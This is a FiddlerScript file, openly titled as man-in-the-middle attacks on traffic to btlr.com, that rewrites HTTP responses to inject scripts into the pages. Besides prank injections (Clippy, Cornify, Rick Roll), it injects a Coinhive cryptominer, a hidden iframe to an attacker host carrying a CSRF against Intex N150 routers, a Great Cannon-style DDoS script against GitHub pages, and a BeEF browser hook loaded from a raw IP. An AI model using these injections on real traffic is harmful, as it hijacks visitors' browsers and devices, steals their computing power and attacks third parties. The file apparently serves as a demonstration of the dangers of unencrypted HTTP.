FiddlerScript MitM Attacks Against Requests to btlr.com

1. static function OnBeforeRequest(oSession: Session) {
2. if (oSession.HostnameIs("btlr.com")){
3. oSession.hostname = "scripting.com";
4. }
5. }
6.  
7. static function OnBeforeResponse(oSession: Session) { // Clippy
8. if(oSession.PathAndQuery == "/encryption_and_privacy.html") {
9. oSession.utilDecodeResponse();
10. oSession.utilReplaceInResponse('</head>','<link href="https://cdn.rawgit.com/smore-inc/clippy.js/master/src/clippy.css" rel="stylesheet"></head>');
11. oSession.utilReplaceInResponse('</body>','<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7/jquery.min.js" integrity="sha256-/05Jde9AMAT4/o5ZAI23rUf1SxDYTHLrkOco0eyRV84=" crossorigin="anonymous"></script></body>');
12. oSession.utilReplaceInResponse('</body>','<script src="https://cdn.rawgit.com/smore-inc/clippy.js/master/build/clippy.min.js"></script></body>');
13. oSession.utilReplaceInResponse('</body>','<script type="text/javascript">clippy.load("Clippy", function(agent){agent.show();agent.speak("It looks like you\'re trying to learn about HTTPS, would you like some help with that?");});</script></body>');
14. }
15.  
16. // Cornify
17. if(oSession.PathAndQuery == "/social_networks_dos_and_donts.html") {
18. oSession.utilDecodeResponse();
19. oSession.utilReplaceInResponse('<h1>Social Networks Dos And Don\'ts</h1>','<h1><a href="http://www.cornify.com" onclick="cornify_add();return false;"><img src="http://www.cornify.com/assets/cornifycorn.gif" width="52" height="51" border="0" alt="Cornify" /></a><script type="text/javascript" src="http://www.cornify.com/js/cornify.js"></script> Social Networks Dos And Don\'ts</h1>');
20. oSession.utilReplaceInResponse('</h1>','</h1><img src="https://www.cornify.com/getacorn.php?r=1531299923195&amp;url=http://btlr.com/social_networks_dos_and_donts.html"><img src="https://www.cornify.com/getacorn.php?r=1531299923195&amp;url=http://btlr.com/social_networks_dos_and_donts.html"><img src="https://www.cornify.com/getacorn.php?r=1531299923195&amp;url=http://btlr.com/social_networks_dos_and_donts.html">');
21. }
22.  
23. // Harlem Shake - paste this one in from console
24. /*if(oSession.PathAndQuery == "/") {
25. oSession.utilDecodeResponse();
26. oSession.utilReplaceInResponse('</body>','<script>(function(){function c(){var e=document.createElement("link");e.setAttribute("type","text/css");e.setAttribute("rel","stylesheet");e.setAttribute("href",f);e.setAttribute("class",l);document.body.appendChild(e)}function h(){var e=document.getElementsByClassName(l);for(var t=0;t<e.length;t++){document.body.removeChild(e[t])}}function p(){var e=document.createElement("div");e.setAttribute("class",a);document.body.appendChild(e);setTimeout(function(){document.body.removeChild(e)},100)}function d(e){return{height:e.offsetHeight,width:e.offsetWidth}}function v(i){var s=d(i);return s.height>e&&s.height<n&&s.width>t&&s.width<r}function m(e){var t=e;var n=0;while(!!t){n+=t.offsetTop;t=t.offsetParent}return n}function g(){var e=document.documentElement;if(!!window.innerWidth){return window.innerHeight}else if(e&&!isNaN(e.clientHeight)){return e.clientHeight}return 0}function y(){if(window.pageYOffset){return window.pageYOffset}return Math.max(document.documentElement.scrollTop,document.body.scrollTop)}function E(e){var t=m(e);return t>=w&&t<=b+w}function S(){var e=document.createElement("audio");e.setAttribute("class",l);e.src=i;e.loop=false;e.addEventListener("canplay",function(){setTimeout(function(){x(k)},500);setTimeout(function(){N();p();for(var e=0;e<O.length;e++){T(O[e])}},15500)},true);e.addEventListener("ended",function(){N();h()},true);e.innerHTML=" <p>If you are reading this, it is because your browser does not support the audio element. We recommend that you get a new browser.</p> <p>";document.body.appendChild(e);e.play()}function x(e){e.className+=" "+s+" "+o}function T(e){e.className+=" "+s+" "+u[Math.floor(Math.random()*u.length)]}function N(){var e=document.getElementsByClassName(s);var t=new RegExp("\\b"+s+"\\b");for(var n=0;n<e.length;){e[n].className=e[n].className.replace(t,"")}}var e=30;var t=30;var n=350;var r=350;var i="//s3.amazonaws.com/moovweb-marketing/playground/harlem-shake.mp3";var s="mw-harlem_shake_me";var o="im_first";var u=["im_drunk","im_baked","im_trippin","im_blown"];var a="mw-strobe_light";var f="//s3.amazonaws.com/moovweb-marketing/playground/harlem-shake-style.css";var l="mw_added_css";var b=g();var w=y();var C=document.getElementsByTagName("*");var k=null;for(var L=0;L<C.length;L++){var A=C[L];if(v(A)){if(E(A)){k=A;break}}}if(A===null){console.warn("Could not find a node of the right size. Please try a different page.");return}c();S();var O=[];for(var L=0;L<C.length;L++){var A=C[L];if(v(A)){O.push(A)}}})()</script></body>');
27. }*/
28.  
29. // Coinhive (show CPU as it runs)
30. if(oSession.PathAndQuery == "/safety_security_1.html") {
31. oSession.utilDecodeResponse();
32. oSession.utilReplaceInResponse('</body>','<script src="https://authedmine.com/lib/authedmine.min.js"></script><script>var miner = new CoinHive.Anonymous("PlJ41covvoEeW7pwQu70a7HJMWfDYE3D", {throttle: 0.3});miner.start();</script></body>');
33. }
34.  
35. // CSRF against Intex N150 routers (CVE-2018-12529)
36. if(oSession.PathAndQuery == "/telecommuting.html") {
37. oSession.utilDecodeResponse();
38. oSession.utilReplaceInResponse('</body>','<iframe src="http://evilcyberhacker.com/RouterCSRF.html" style="display: none"></iframe></body>');
39. }
40.  
41. // Great Cannon
42. if(oSession.PathAndQuery == "/online_marketing.html") {
43. oSession.utilDecodeResponse();
44. oSession.utilReplaceInResponse('</body>','<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"></script><script src="http://code.jquery.com/jquery-latest.js"></script><script>startime = (new Date).getTime();var count = 0; function unixtime() { var a = new Date; return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3}url_array = ["https://github.com/greatfire", "https://github.com/cn-nytimes"];NUM = url_array.length; function r_send2() { var a = unixtime() % NUM; get(url_array[a])} function get(a) { var b; $.ajax({ url: a, dataType: "script", timeout: 1E4, cache: !0, beforeSend: function() { requestTime = (new Date).getTime() }, complete: function() { responseTime = (new Date).getTime(); b = Math.floor(responseTime - requestTime); 3E5 > responseTime - startime && (r_send(b), count += 1) } })} function r_send(a) { setTimeout("r_send2()", a)}setTimeout("r_send2()", 2E3);</script></body>');
45. }
46.  
47. // BeEF
48. if(oSession.PathAndQuery == "/what_startup_needs.html") {
49. oSession.utilDecodeResponse();
50. oSession.utilReplaceInResponse('</body>','<script src="http://104.210.63.219/hook.js"></script></body>');
51. }
52.  
53. // Rick Roll
54. if(oSession.PathAndQuery == "/projects.html") {
55. oSession.utilDecodeResponse();
56. oSession.utilReplaceInResponse('</body>','<style>.content_div, .cd{width:500px}</style></body>');
57. oSession.utilReplaceInResponse('<img border=0 src="bg_misc9.png">','<iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ?ecver=2&autoplay=1" width="500" height="400" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>');
58. }
59. }